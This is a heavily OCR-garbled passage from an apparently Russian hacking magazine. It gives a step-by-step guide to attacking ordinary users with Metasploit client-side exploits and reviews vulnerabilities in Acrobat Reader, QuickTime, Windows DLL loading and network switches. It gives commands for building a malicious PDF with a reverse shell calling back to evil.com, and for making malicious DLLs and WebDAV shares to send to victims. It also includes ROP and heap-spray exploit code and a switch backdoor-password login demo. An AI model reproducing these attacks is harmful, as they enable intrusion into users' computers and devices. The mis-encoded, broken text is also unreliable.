етеІ-ѵ2-0-0.азрх] 

С помощью нее можно как настроить общие политики и включить ЭЕР, 
5ЕН0Р, А5ЕР для всей системы, таки выполнить настройки для конкрет- 
ного приложения. Еслиточнее.то она позволяет включить для ПО и его 
модулей (внезависимости оттого, с какими опциями они собраны] сле- 
дующие возможности: стандартные ЭЕР, АВИВ, 5ЕН0Р, а также защиту от 
Ьеарзрау’ев и шеллкодов. 

Надо, конечно, понимать, что не все ПО будет корректно работать. Но в 
определенных ситуациях это помогает. Пример есть на сайте М5: Осіау- 





Принудительное включение АЗЫ? для АсгоЬаІ РеасІеГа. 
ЭШ'ка ЕМЕТ'а смещает не-АЗІЯ-модули, и КОР уже не 
сработает 



эксплойт для АсгоЬаІ: Реасіег под ѴѴіп7 с обходом ОЕР, используя РОР, не 
работает, таккакне-АЗЬР-библиотека была смещена в памяти ЕМЕТ’ом 

(Ыод5.1есИпеЕсот/Ь/5гсі/агсІііѵе/201 0/09/1 0/изе-еппеІ-2-О-Іо-Ыоск-ІІіе- 
асІоЬе-О-сІау-ехрІоіЕазрх) 

Видео потеметамже: ІюсЬпеЕітіісгозок.сот/еп-из/зесигііуЛгабЗбЗЗ. 
азрх 

Программа работает минимум на ѴѴіпХРсЗРЗ, но поддержки 5ЕН0Р и 
А5ЬР тебе это не даст. Так что полную радость можно получить только на 
ѴѴіп7 и ѴѴіп2008. 



Мп / ЗАДАЧА: АТАКУЕМ ПРОСТЫХ ЮЗЕРОВ, 

ІМ - О ИСПОЛЬЗУЯ СЫЕЫТ-5ШЕ-СПЛ0ИТЫ 

РЕШЕНИЕ: 

Компьютерытеперьвездеи вся. Несчастных юзеров полным-полно. 
Почему несчастных? Да потому что во многом они стали основной целью 
для «хакерских атак» :). Особенно с развитием всяких систем переводов, 
интернет-банкинга и других видов электронных денег. Теперь снять профит 
собычного юзера — не проблема. И это уже несчитая классики типа спама, 
ботнетов, ОоЗ’ов, кражи конфиденциально информации. Антивирусы, 
файеры, ЮБ’ы, системы обновления ПО. Сэндбоксы спасаюттолько 
небольшую толпу продвинутых юзеров/фирм, таккаких надо и настроить, 
и правильно реагировать на угрозы, и купить само ПО. В итогеимеем 
широкий выбор из миллионов менеджеров/бухгалтеров для «работы» с 
ними :). Атутеще и реально критическиеуязвимости оттаких контор, как 
Місгозоки АбоЬе, чье ПО является де-факто стандартом по миру. Да, в этом 
смысле лето было богатым! В качестве примера я приведутри сплоита: 
АсІоЬе АсгоЬаІ РОРСооІкуреЗіпд (версии <=9.3. 4/8. 2. 4], М5 ОЕИ Нцаскіпд, 
М5 и\ІКсплоит(М510-046]. Описание подробностей сплоитовты можешь 
прочитать в «Обзоре эксплойтов» от Алексея Синцова в этом и в прошлом 
номерах. Какни странно, все примеры реализованы с помощью Меіазріоіі: 
Егатеѵѵогк. Тут надо отдать должное создателям М5Е — они чрезвычайно 
быстро стали добавлять сплоиты ксамым массовым критическим уязви- 
мостям. Некоторые реализации уязвимостей и вовсе появляются сразу в 
М5Е, без сторонних РоС’ов. Все три перечисленныеуязвимости были 0-Ьау, 
когда попали в М5Е. Сейчасуже есть кое-какие патчи, но вернемся кделу. 

1) АбоЬе АсгоЬаІ: РОЕ СооЕуреЗіпд. АЬоЬе этим летом дал миру несколько 
суровых дыр. Это одна из них. Заходим в тзіюопзоіе и: 




Тесгим сплоит под АсгоЬаІ Кеасіег. Нагрузка — кальку- 
лятор :) 



Выбираем сплоит : 

тзк > изе ехр1оік/міпскжз/кі1екогтак/ас1оЪе_соо1куре_ 
зіпд 

Задаем имя файла: 

тзк > зеб РІЬЕЫАМЕ хакер_иЬі1еіпуі_ѵуризк . рбб 
Куда сохраняем? В коте: 
тзб > зек (ШТРІІТРАТН ~ 

Выбираем нагрузку и ее настройки: 

тзб > зек РАУЬОАБ міпскхѵз/з]те11/геѵегзе_кср 

тзк > зек ЬНОЗТ еѵіі.сош 
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Бэкдор через презентацию М5 О№ое 



тзб > зеб БРОКТ 80 

Теперь на наш еѵіі.сот вешаем пеісаі, например, и посылаем жертве 
файликпо почте. 

Простой реверсовый шелл нужен, во-первых, чтобы обойти І\ІАТ, файер, 
а во-вторых, чтобы не привязываться к процессу (чтобы соединение не 
оборвалось при закрытии АсгоЬаІ Реасіег’а]. 

Есть аналогичный сплоит, но проводящий атаку через браузер и 
АбоЬе’овский плагин к нему — ехр Іо іѣ/ѵѵі п сі оѵѵз/Ь гоѵѵэе г/а сі о Ь е_со о І1:у ре_ 
зіпд. 

2) М5 Ы\ІКсплоит(М510-046]. Сплоитиз разряда фич :) 

Выбираем сплоит : 

тзб >изе ѵ7Іпсіотлз/Ъгочлзег/тз10_046_збюгбсиб_ісоп_ 
бШоабег 

Настраиваем пэйлоад: 

тзб >зеб РАУБОАБ іліпс1оѵ\гз/тебегргебег/геѵегзе_бср 
тзб >зеб БН08Т 192.168.0.101 

По сути, сплоит поднимает ѴѴеЬОАѴ и кидаеттуда ярлыки. В результате 
либо даем бедному пользователю полученную ссылку, либо делаем 
ярлычок на ресурс. То есть сплоит из локального стал удаленным (через 
шару и ѴѴеЬОАѴ]. Павним бедного юзера — ему вряд ли что-то поможет :). 
Злую ОЬЕкудля этого и следующего сплоита можно создать и ручками. 
Ярлычок, понятное дело, тоже. 

$тзбрау1оас! чліпс1оѵ\гз/тебегргебег/геѵегзе_бср 
ЬНОЗТ=192 . 168 . 0 . 101 Б > еѵіі .611 

Где: 

тпбоУ7з/тебегргебег/геѵегзе_бор — название нагрузки. 



БН08Т=192 . 168 . 0 . 101 — настройки 
Б — указываем, что создаем БББ'ку; 
еѵіі. 611 — имя итогового файла. 

3) М5 ОБЬ Нцаскіпд 

Это оченьзабавная вещь! С ее помощью мы фактически можем «пре- 
вратить» любой миролюбивый формат файла во что-то злое. 
Пришлюттебе файлы с какой-нибудь презентацией или чертежами 
АіЛоСАО’а, например. Асреди них какая-то библиотечка валяется. Бы- 
вает ведь. Ты, конечно же, запустишь сам чертеж, а тут — бац! — и у тебя 
бэкдор. Хорошее дело! 

Подробное описание «почему и зачем так» смотри на следующей стра- 
ницеуАлексея Синцова :). 

Атеперь — немного практики: 

Выбираем сплоит : 

тзб > изе ^іп6о^з/Ьгоѵ^зег/ѵ^еЬ6аѵ_611_Ыз аскег 

Задаем имя файлов: 

тзі > зеб ВА8ЕБАМЕ роіісу 

Задаем расширение файла: 

шзі > зеб ЕХТЕЫ8ІСЖЗ ррб 

Имя для шары: 

шзб > зеб 8НАКЕБАМЕ босз 
Нагрузка : 

тзб > зеб РАУБОАБ міпбомз /шебегргебег/Ьіп6_бср 

После этого либо впариваем жертве ссылку на шару — \\1 92. 1 68.0.1 0 1 \ 
бос5\, либо на НТТР-сервак — ШрУ/1 92. 168.0. 101 :80. Жертва открывает 
файлик— мы получаем шелл. Честный обмен :]. 

Опять же, по сути, локальная уязвимость превратилась вудаленную за 
счет шары и ѴѴеЬОАѴ. □с 
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НУАСКІЫС 



ТАВСЕТ5 



• ѴѴіпсІоѵѵз ХР 

• ѴѴіпсІоѵѵз 7 

• ѴѴіпсІоѵѵз 2000/2003/2008 
Ш 

ІЧ/А 



гшз 



Очередная уязвимость-фича от компании МісгозоД, На этот раз 
«фича» позволяет выполнить произвольный код на удаленной сис- 
теме. Началось все стого, что исследователь Саймон Рэйнер (Вітоп 
Рапег) из компании Агсоз отправил в Арріе ІТипез отчетобуязви- 
мости, вернее, об особенности загрузки ОІ_І_-библиотекво время 
запуска приложения. Подробностей уязвимости они не сообщили, 
так какэто «очень опасно», и возможна угроза появления червя. Суть 
угрозы — выполнение произвольного кода, втом числе и удаленно 
через расшареные ресурсы и ѴѴеЬОАѴ. Спустя несколько дней об этой 
угрозе говорил каждый, кто хоть как-то соприкасается с ИБ. Оказыва- 
ется, дело не только в Арріе ІТипез, а еще и в особенностях подгрузки 
ОББ, и уязвимо может быть любое приложение. Тут стоит отметить, 
что на дворе 2010 год, а люди стаким воодушевлением обсуждают 
уязвимость, которая была в паблике ажс 2000 года. Дело втом, что 10 
лет назадзнаменитый Георгий Гунински (Оеогді Сипіпзкі) написал в 
багтрекзаметку о том, что ѴѴіпсІоѵѵз имеет проблемы с очередностью 
выбора пути при поиске .ОББ-файлов, и выложил эксплойт к МісгозоІІ 
ОІТісе. Корпорация МелкоМягких почесала за ухом и изменила после- 
довательность, но, ксожалению, это несильно помогло, так каксуть 
проблемы, в конечном счете, осталась нерешенной. В итоге програм- 
мисты сами должны учитывать особенности ОС при загрузке библи- 
отек (естественно, они этого не делают, так какзнатьтакие мелочи не 
всегда возможно). Атаку можно выполнять, как я уже сказал, через 
интернет, причемтакой функционал тут же вошел в состав МеІазрІоіБ 
0 том, какэто можно сделать, читай в рубрике у Алексея Тюрина в этом 
номере, мы же поговорим о том, каки почему это чудо работает. 



ЕХРЮІТ 



На самом деле никаких секретов нет. Дело в «привязанности» про- 
граммистов к короткой формезаписи и в логике очередности поиска 
пути в системе ѴѴіпсІоѵѵз :). Итак, известно, что любое приложение лю- 
бит грузить кучу модулей и библиотек. Чтобы программист могудобно 
это делать, существуетспециальная АРІ-функция — БоабБіЬгагу 



(это в общем случае). Допустим, мы программисты и хотим написать 
программу, которая грузит ОБІБку; повинуясьлогике, мы делаемтакой 

ВЫЗОВ: 

ЬоасІЬіЪгагу ( "Ьгік . с111 " ) ; 

Мы привыкли, что ОББ-файлы лежат в директории с приложением, 
либо в системной директории, поэтому путь не указывается. Но вот 
ѴѴіпсІоѵѵз не знает, где именно лежитэта библиотека, и начинает ее 
искать в следующих местах, отсортированных по очередности поиска: 

1. Директория, откуда приложение запущенно; 

2. Системная директория ; 

3. Системная директория для 16-битных систем; 

4 . Директория Міпбоѵѵз ; 

5 . Текущая рабочая директория ; 

6 . Директории из переменной окружения РАТН . 

Теперь осталось понять, что текущая директория определяется только 
местом, откуда был вызвано приложение. Если файл, ассоциирован- 
ный с нашим приложением (.ТХТ-файл ассоциирован с блокнотом, 
.ТОРРЕІЧТ с иТоггепБ .ХБ5 с ЕхсеГем и т.д.) лежит в папке Б:\ 2 ІоЬа,то 
именно эта папка и станеттекущей директорией для нас. Если папка 
лежит на расшареном ресурсе, то, соответственно, ресурс станет 
рабочей директорией. Вспомним, что шару можнотуннелировать 
через НТТР с помощью ѴѴеЬОАѴ. При этом, если Ьгік.сШ находится в 
одной из директорий переменной окружения РАТН, получается, если 
дважды щелкнуть по ассоциированному файлу, откроется приложе- 
ние, которое попытается сначала найти ЬДк.сИІ в системных дирек- 
ториях, потом в папке ОЛгІоЬа, и лишь потом успокоится и найдетего 
в директории из РАТН. Но что будет, если рядом с ассоциированным 
файлом в 0 ЛгІоЬа положить файл Ьгік.сІЦ? Тогда приложение на пятом 
шаге поиска найдетего и загрузит. Отсюда и проблема: можно поло- 
житьассоциированный файл, узнать имя БЕЕ-библиотеки, которую 
он попытается подгрузить изтекущей директории, и все — можно 
атаковать. Разберем на примере иТоггепі, популярного клиента Р2Р, 
ассоциированные файлы которого имеют расширение .ТОРРЕІЧТ. 
Попробуем найти имя библиотек, которые будут разыскиваться в 
текущей директории. Для этого создадим на расшареном ресурсе 
пустой файл с расширением .ТОРРЕІЧТ. После этого откроем утилиту 
мистера Руссиновича, РгосеззЕхрІогег, и настроим фильтры — нас 
интересуетдиректория шары и процесс иІоггепБехе. Теперь все фай- 
ловые обращения этого процесса к нашей шаре мы увидим в окошке 
монитора. После настройки фильтра дважды щелкнем по созданному 
.ТОРРЕІЧТ-файлу и посмотрим логи монитора. В итоге видно, что 
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ОН Нііаскіпд — определяем уязвимость 



процесс иіоггепі.ехе пытался найти на нашей шаре и подгрузить две 
библиотеки. Не будем огорчатьторрент-клиенти подсунем в шару 
рядом с ярлыком ,ОІ_І_-файл стем именем, который ему необходим 
— рІидіп_сІІІ.сІІІ. В качестве примера наша версия рІидіп_сІІІ.сІІІ будет 
содержать нагрузку из метасплойта — запуск калькулятора. Чтобы 
создать библиотеку стакой нагрузкой, воспользуемся утилитой 
тзірауіоасі из набора Меіазріоіі: 

$ тзбрауіоасі міпсіотлз/ехес СМБ=са 1 с Б > р 1 идіп_с 111 . сЗ .1 1 

Повторный запускторрент-клиента через созданный .ТОРРЕЫТ-файл 
судаленного ресурса вызовет запуск калькулятора — вуаля, произ- 
вольный код выполнен. Поискуязвимых приложений автоматизиро- 
ван, например, с помощью сборки от Раріб7 — ЬирзУА/ѵѵѵѵѵ.теІазрІоіІ:. 
сотЛюбтіпе/рго]ес1:5/1таппе\л/огк/геро5І1:огѵ/гаѵѵ/ех1:ета[/5оигсе/ 
Р1_1_НііаскАис1і1:КІ1:.2Ір [эта утилита была рассмотрена в прошлом номе- 
ре в разделе РАО ІІпіІесІ). На данный момент существуетсписокуяз- 
вимых продуктов, который регулярно обновляется — ехрІоіІ-бЬ.сот/ 
бІІ-Ь^аскіпд-ѵиІпегаЫе-аррІісаІіопз/. Еслиты хочешь более подробно 
разобраться с принципами работы поиска пути при загрузке ОбЕ, 
различными АРІ-функциями для контроля этого порядка, то об этом 
можно почитатьу Таихо Квона (Таебо Кѵѵоп) и Джендонга Су (2Ьепбопд 
5и) в документе сз.исбаѵіз.еби/гезеагсбЛесб-герогІзАЮІ 0/СВЕ-201 0- 
2. рсіб . Этот документ был опубликован почти год назад, но никто не 
уделил ему должного внимания, а ведь эти ребята тогда уже заметили, 
что уязвимость осталась, и ее содержат множество приложений. 



50ШТЮЫ 



Сначала решения какбы не было, и разработчики ПО сами фиксили 
код приложения, но потом Місгозоіі все-таки перебороли себя и сде- 
лали фикс, который по факту позволяет: 

• удалять текущий рабочий каталог из пути поиска библио- 
теки ; 

• запрещать приложению загружать библиотеку из папки 
МеЪБАѴ; 

• запрещать приложению загружать библиотеку как из папки 
ШеЪБАѴ, так и из расшареных ресурсов. 
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РІ1 Нііаскіпд — список уязвимого ПО 



Что касается разработчиков, то можно обезопасить свое ПО, удалив 
текущую директорию из пути поиска: 

ЗебБІІБігесбогу ( " " ) ; 

Разумеется, делать это необходимо до вызовов І_оасИ_іЬгагу. 



А Л ЧЕРН 
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ТАВСЕТ5 



* Арріе ОиіскТіте < 7.6.8 

ЕЗ 

СѴЕ-2 010-1818 

гшз 

Тяжелая работа у программистов — писать свой код, разбираться в 
чужом коде, править его, дописывать, переписывать и т.д. Втакой 
ситуации можно что-то забыть или не заметить. Поэтому велика 
вероятность, что втакой обстановке проявятся уязвимости. Похоже, 
что именнотакая штука и произошла с программистами компании 
Арріе, которые кодили небезызвестный проигрыватель ОиіскТіте. 
Уязвимость долго пряталась в недрах плеера, пока в конце августа 
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РИ Нііаскіпд — эксплойт в действии 



баг-хантер Рубан Сантамарта (РиЬеп Бапіатагіа) не нашел ее путем 
статического бинарного анализа АсІіѵеХ- компоненты ОиіскТіте. 



ЕХРЮІТ 



Первым делом Рубэн заметил, что в коде обработки параметров- 
свойств объекта есть код проверки наличия скрытого параметра 
«_Ма гзЬа ІесІ_рІ) п к». В документации кАсбѵеХэтот пара метр даже не 
упоминается: 




ОиіскТіте — берем адрес из поддельного указателя 

15220с24 КОР_АББЕ // КОР-программа — первая инс- 

трукция делает из кучи стек 

1522 0с2 8 КОР_АББК //а дальше обычная КОР-программа 

1522 0с2 с КОР_АББК 

1522 ОсЗ О КОР_АББК 

Теперь Неар Эргаузайметпамять по адресубхі 5220000, после чего 
выполняем атаку: 



ризН 


оббзеб а_тагзЦа1еб_рип ; "_Магз]іа1еб_рІІпк" 


ризН 


еЬх 


Имя свойства 


саіі 


еЬр ; ІзбгстріА ; 


Сравним имя с ШМагзИаІеб-рипк" 


безб 


еах , еах 


Равны? 


з'п 2 


збюгб 1ос_10002С4А ; Если нет, то идем куда-то там 


ризН 


ебі ; 


Указатель на строку параметра 


саіі 


зиЬ_10001310 


Перевод значения строки в Ь(ЖС 


абб 


езр, 4 




Іеа 


есх, [езі+13В8Ь] 




ризб 


есх 


ррѵ 


ризб 


оббзеб ііб 


ііб 


ризб 


еах ; 


Наш параметр (4 байта) 


саіі 


бз : СоСебІпбегбасеАпбКеІеазеЗбгеаш ; Вызов 



функции, где дескриптор іЗбгеат мы контролируем (еах) ! 

Как видно, все просто — то, что заносится в параметр _МагзЬаІесІ_ 
рііпк, будет адресом дескриптора. Остальные параметры берут- 
ся из статичных мест, темнеменее Рубэн удивился, так как эти 
параметры вообще нигде больше не используются. Это странно, 
поэтому он скачал более древнюю версию ОиіскТіте (6.5.1 .1 7) 
и увидел, что там этот код вовсю используется для обрисовки в 
текущем окне, для того данный параметр и применялся, чтобы 
указатель был на текущее окно. Только вот программисты, когда 
удаляли старый код и функционал, забыли удалить параметр, 
который влиял на дескриптор. Теперь мы можем менять хэндл, 
указывая на любой участок памяти, осталось только по этому ад- 
ресу сымитировать интерфейс іЭігеат с поддельным указателем 
ѵТаЫе. Другими словами, Рубэн предлагает использовать Неар 
Эргау для того, чтобы внедрить РОР- про грамму по отключению 
РЕР и выполнению произвольного кода. Перед РОР разместить 
поддельный указатель ѵТаЫе: 

Неар аббг Ѵаіие 

15220с20 15220с18 // Подделываем указатель ѴТаЫе 

-- САШ [ 1522 0с18 + 0х0С] 



ѵаг багд = 0x1522 0с2 0 ; 

ѵаг оЪд = '<’ + ' обдесб с1аззіб= "сізіб: 02ВЕ25Б5-8С17- 
4В23-ВС80-В3488АВББС6В" тлыббЬ= " 0 " НеідПб= " 0 " ' + •>' 

+ '<■ + ' РАКАМ паше = "_МагзЦа1еб_рШ.к" ѵа1ие="' + багд + 

' " ' + ' />' 

+ ' </ ' + ' окд есб> ' ; 

боситепб . дебЕІетепбВуІб ( ' хрі ' ) . іппегНТМЬ = окд ; 

Работающий эксплойтуже включен в сборку Меіазріоіі, так что 
можешь проверитьсвой ОиіскТіте на наличиеуязвимости :).Хочу 
только отметить, что тамошняя версия работаетпод версию 7.6.7 на 
ѴѴіпбоуѵзХРЭРЗ. Под семеркой мешает А5І_Н, так как все модули пле- 
ера поддерживают данную штуку. Тем не менее, можно самостоятель- 
но переписать РОР-программу, используя другие сторонние модули в 
памяти процесса без поддержки А5І_Р. 



50ШТЮЫ 



Решение банально до безобразия —установи последнюю версию 
ОиіскТіте (на данный момент это 7.6.8). 




ЧЕРНЫЕ ХОДЫ В АКТИВНЫХ СЕТЕ- 
ВЫХ УСТРОЙСТВАХ 



ТАК6ЕТ5 



* ЗСот 3812 

* ЗСот 3870 

* Ебдесоге Е54649 

* ОеІІ РошегСоппесГ 5224 

* Возможны и другие 

КП 

И/А 
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Диалог в комментариях к статье о проблемах в свитче 

между разработчиком и исследователем — мило :) 



ЕШЗ 

Развиваятему черныхходов, нельзя неупомянуть про интересное 
исследование, сделанное год назад на конференции НАР2009, где 
исследователи Эдвин Ифтинг(ЕсІѵѵіп ЕеШпд), ЭрикСмит(ЕгікБппіі) и 
Эрвин Дрэнт (Егѵѵіп Эгепі) опубликовали информацию отом, что мно- 
гие устройства типа «Свитч», основанные на Ассіоп, имеютскрытый 
па роль от суперпользователя. Однако за год ничего не произошло — 
ни патчей, ни обновлений баз сканеров безопасностей, то есть вроде 
инфа была, а те, кто отвечаетза безопасность, даже не шелохнулись. 
Поэтомутоварищи повторно описали ситуацию, добавили в список 
новые устройства, выложили эксплойт и надеются, что проблема по- 
лучит решение. Так, собственно, о чем же целый год до нас пытались 
донести эти исследователи? 



ЕХРЮІТ 



Дело было вот как: Эрикхотел тупо поставить Ыпих на свой свитч, и в 
процессе отладки фирмвари он обнаружил какую-то подозрительную 

строку: « зирег». Строка как-то связана с системой аутентификации, 

но дальше разбираться было затруднительно, поэтому Эрик позво- 
нил в техподдержку. После небольшого разговора стало понятно, что 
это нужно в случае, если пользователь забудет пароль от сетевого 
устройства — по звонку в техподдержку можно получить уникаль- 
ный пароль, чтобы пользователи смогли войти в систему без сброса 
конфигурации, но пароль на каждом свитче разный. Поэтому когда 
Эриксказал, что он вродезабыл пароль, техподдержка попросила 
назвать МАС-адресустройства. Этой информации уже было достаточ- 
но, чтобы исследователь сообразил, что пароль генерируется на базе 
МАС’а, и, в принципе, можно написать генератор паролей... Сказано 
— сделано. Конечно, было все нетак-то просто, тем не менее ребята 
достали прошивку, разреверсили ее и вытащили алгоритм генерации. 
Результатом этой трудоемкой работы стал эксплойт-генератор паро- 
лей, единственный параметр которого — МАС-адрес. Таким образом, 
достаточно получить этот адрес, например, с помощью АРР-протоко- 
ла, или, если устройство в другом сегменте сети, по 5ЫМР- протоколу. 
После этого генератор выдаст пароль, который подходит как к55Н, 

таки кіеіпеі- и НТТР-интерфейсам. Имя пользователя — « зирег». 

Пример работы эксплойта: 

1. Сначала получаем МАС свитча: 

# агр -ап | дгер 10.0.1.2 

? (10.0.1.2) аВ 00 : 0Е : 6А: СВ : В4 : 41 [еШіег] оп еЫіО 

2» Получаем пароль суперпользователя: 




АсгоЬаі Реасіег — сертификат, заверенный ѴегіЗідп 



# регі ассВоп.рІ 000Е6АСВВ441 
П98БМ1Н 

3. Входим в систему: 

# ВеІпеВ 10.0.1.2 
Тгуіпд 10.0.1.2. . . 

СоппесВесІ Во 10.0.1.2. 

Езсаре сЬагасВег із ,А ] ' . 

Ьодіп: зирег 

Раззѵгогсі: М98БМІН 



Мепи орВіопз : ЗСош ЗирегЗВаск 3 ЗміВсЬ 3824 24- 

рогВ 

Ьгісіде - АскпіпізВег ЬгісЗде-місЗе рагатекегз 

ІеаВиге - АсЗтіпізВег зузкет ВеаВигез 

деВВіпдЗВагкесІ. - Вазіс сіеѵісе сопіідигакіоп 
ІодоиВ - ЬодоиВ оі Ыіе Соттапсі Ыпе ІпВегІасе 

рЬузісаІІпЦегІасе - АсЗтіпізЦег ркузісаі іпСегІасез 
ргоВосоІ - АсЗтіпізЦег ргокосоіз 

зесигіЦу - АсітіпізВег зесигіЦу 

зузВет - АсЗтіпізЦег зузСет-Іеѵе! ІипсВіопз 



ЦгаІІісМападетепЦ - АбшіпізЦег Цгаіііс тападешепС 

Сам по себе генератор — это просто последовательность матема- 
тических операций с магическим числом и байтами М АС-адреса. 
Генератор есть на диске, можешь разбираться :). 



50ШТІ0М 



Разработчик предлагаетограничивать пользовательский доступ к 
административному интерфейсу по ІР-адресу: 
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р№Н1 -%Ііліегч!];М№^і -ѵцічіііівйпп р, р ;*Ш^-РС Т.р.;ііиш| 



РНі Орр#тгі РМ Цітіі Ш? 



тоР.ртіі ■ АкБ* Рж*«м;н?^ чд 

Рііі № № Внилэді Х*ьн № 



шк эдакс**#*^ ига#!** 

і.^ч Т'Яьк 

О 75 135.ИЗ& К 35 312 К ВДіАйп Ь: ЙСпМйЛБе. 
7 516 К ВДКтй'ыт ЛШІІ. Ьй 
І.ЯІК *ЯКУН*«Н*, -Жят.іц 
М4К льисквит^ 
іЗМІІ ЛбКЭтГи* №»№ 
І.ШК ЩК^ІМ №4іІМ 



ИРГ&РіГСІ 



9*л ■ ліо ма ам № и А5І.Й п об*мден 



З/Ль'ЙШИ АМ Агі^Ъс Аё№М О. 





» МгішфгЬ к 1-9М&ЗІЗ » і* Ь 




■р ■« : 


X Р\ 




И сррі Вс*а«г д 


Рінч Тейп 











Л? И ГкдЛфіИ 








4324 МВД К 


2»К 







АсгоЬаІ Реасіег — эксплойт в действии 



Сопзо1е#соп1ід 

Сопзоіе (сопіід) #тападетепС ? 

аІІ-сІіепЬ Асісіз ІР асісігеззез Со 8ШР, МеЪ апсі ТеІпеР 
дгоирз 

ЪРРр-сІіепР Асісіз ІР асісігеззез Со Ыіе ШеЬ дгоир 
зпшр-сііепр Асісіз ІР асісігеззез Со Ыіе ЗШР дгоир 
РеІпеР-сІіепР Асісіз ІР асісігеззез Со Ыіе ТеІпеР дгоир 
Сопзоіе (сопіід) #шападешепР аІІ-сІіепБ ? 

А. В. С. Б ЗРагРз ІР асісігезз 

Сопзоіе (сопіід) #шападешепР аІІ-сІіепБ 192.168.1.1 ? 
А. В. С. Б Епсіз ІР асісігезз 

Сопзоіе (сопіід) #шападешепР аІІ-сІіепБ 192.168.1.1 
192.168.1.10 



гшз 

Самый частый гость нашего обзора — АсгоЬаІ Неасіег, вот и в этом 
месяце он заглянул на страницы нашего журнала сочередной 
уязвимостью нулевого дня. Неизвестные злоумышленники опять 
воспользовались ошибкой в этом чудесном продукте для распростра- 
нения заразы среди благочестивых пользователей сети. Но в этот раз 
эксплойт оказался еще лучше, нежели во все предыдущие — в этот 
раз он обходил нетолько О ЕР, но и АЗ І_Н. Достигнуто это было за счет 
РОР в модулях, которые не поддерживали А5І_Н. То есть по-нашему это 
уже баян, но в данном случае это первое проявлениетакого эксплойта 
в дикой природе. Добавим ко всему тот факт, что РйР-файл с заразой 
имел валидный сертификат — и получается уже довольно действенная 
угроза. Теперь побаловаться им можем и мы. 



Крометого разработчиксообщил, что он не дремлет, и еще год назад 
убрал возможность аутентификации по этому паролюудаленно. 
Все-таки это приятно. Тем не менее, сделал он это втихую, и теперь 
непонятно, какая прошивка имеетуязвимость, а какая — нет. Все-таки 
РиЦ-ВізсІозиге бывает полезен :). 



ЕХРЮІТ 



Начнем с разбора уязвимости. Ошибка заключается, какэто ни ба- 
нально, в переполнении буфера в стеке. Проблема начинается, когда 
АсгоЬаІ Неасіег пытается пропарситьЗІОЫ-таблицу шрифтов ТшеТуре. 



ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В АООВЕ АСКОВАТ РЕАОЕР 



ТАВСЕТ5 



* АсІоЬе АсгоЬа* Реасіег <= 9.3.4 

гпэ 

СѴЕ-2010-2883 



ЕЩЕ КОЕ-ЧТО... 



Компания АЬузззес объявила сентябрь месяцем 0-бау’ев. 
Другими словами, каждый день сентября нас ожидало оче- 
редное описание новых и не очень уязвимостей, анализ 
бинарного кода, патчей и даже РоС. Были описаны проблемы 
в продуктах Місго505Іі, Моііііа, Зип, Моѵеіі, НР и т.д. Свои 
релизы они выкладывали на сайте ехрІоіІ-бЬ.сот . так что если 
ты еще не успел заценить их публикации, советую просмот- 
реть их. Полный список работ найдешь здесь — аЬѵс 
Ыод/201 0/09/тоаиЬ-1 . 
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ліОДое СорГТѵРі? ШіО тосіп:- 1 _ и 31 з :*. БиіТс-і О-еШс-ѵ іЗ.і 



РГт* іггііР иі «Піи гц ц.цігѵ -4 еріім) *м 1 риз» ЪилпеН ЕкрЮіП* евпішиг 

Асіоік СооГГуре ЭІМО Тав[р"ипІчи*Капчч" 6(кк ВиІТвг Оѵегікт 

Зеіесі р-ауіоасі івг ІаідеІ АиІепшІІс 



ЕиріаіГ іяи пеней. ІГ тщ е ѵріоіг еагшаіі щіпйа* <№«$ поі арреаг, ріщ* -с Иск ! 



С . ШІМ00Ѵ^?\і/4ЕетЭгксі і і ено гксі 192 Л6Ъ. 11.2 44*4 



ГѲТД ІЛ 



^ ЕцйЛк -4 Аш*ѵЫ V Рі^т 



■СяиЫе 



7№* тяйЫ? йъуЫг » ѵуІп^ЬіІііу іп Ич 
ѵгИМЛ Ѵ*^юп$ 8.3 4 &4 ?, Э.4 рГ АіДОм 
ѵчП. 



■ ! шнЬ.в- 1 ]! Іп іі. ѵ." . ■а -- ііаъ' (спет. 3 4 а] 

\ -■ ■■« | 5 9 3 акркФіък ■ 302. й.м А 1 1 1 □ Е у 
+ — — ■ | ЯЛ р-н-у і с-а-Н ■ - ЯТ ■ тѵг-эіЗн г а - -И пгсд 
«| іѵт'і г 104^3 ирйы.-»й т.й^*у Гійі-й О? 



[ + ] Ск іьс.іли ііі х. р-і!. ( Е1І*. 

[ т ) Сіп+тьт-ч^ чадьрит; <ііі /■* 

[*1 ІХЕіЗаът. -■-■ср 3 і«Т. □ Н . Ъті.т. по ітііі'п уни п 
шші ■» крі е-и: » 
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Дело втом, что в этой таблице есть поле ипщиеІМате, которое 
содержит строку. Эту строку программа обрабатывает, конкатенируя 
ее к выделенной в стеке памяти с помощью зігсаі:. При этом размер 
выделенной памяти статичен. Это означает, что если запихнуть в поле 
ипщиеІМате очень большую строку, то произойдет переполнение 
буфера в стексо всеми вытекающими последствиями. А последствия 
были таковы: адрес возврата и часть стека за адресом перезаписаны 
небольшой РОР-программой, которая меняла адрес вершины стека 
на ОхОСОСОСОС. Поэтому адресу с помощью Неар Эргау заранее раз- 
мещалась вторая часть РОР. Сделано это потому, что вторая часть про- 
граммы содержит в себе нулевые байты, и внедрять их в стекпри пере- 
полнении нельзя. Интересен также и метод обхода ОЕР. Мы привыкли, 
что для обхода этой защитной методики обычно используются такие 
АРІ-функции, какѴігІиаІРгоІесі/ѴігІиаІАІІос или ѴѴгіІеРгосеззМетогу, 
нотут злоумышленники проявили оригинальность. Сначала они со- 
здали пустой файл с именем «ізо8859 1 » втекущей директории, вызвав 
АРІ-функцию СгеаІеРіІеА. После этого РОР-программа создаетобъект 
для отображения файла с помощью СгеаІеРіІеМарріпдА, после чего 
вызов МарѴіеѵѵО^РіІе выделяет память для отображения. Эта функция 
как раз и помогаете обходом ОРР. 

ЬРѴОІБ МарѴіеѵЮІЕіІе ( 

НАЫБЬЕ АЕіІеМарріпдОЪб есб , // дескр . объекта про- 



ецируемый файл (хэндл, полученный СгеабеЕіІеМарріпдА) 
БЖЖБ бѵДЭезігесІАссезз , // режим доступа ( 0x22 - 

РІЬЕ_МАР_ЕХЕСБТЕ | РІЬЕ_МАР_ШКІТЕ ) 

БШОКБ бмЕіІеОІІзебНідЪ. , // старшее ШОК.Б смещения - О 
БѴЮКБ бѵтЕіІеОІІзеЦЬом, // младшее БѴГОКБ смещения - О 
ЗІ2Е_Т білЫишЬегОбВубезТоМар // размер - 0x10 0 0 
) ; 

Второй параметр задает права на память, и злоумышленники 
логично предположили, что память должна быть исполняема. 
Следующие действия — копирование из кучи шеллкода в память 
(поможет тетсру). 

Логично, что шеллкод в свежевыделенной памяти можно 
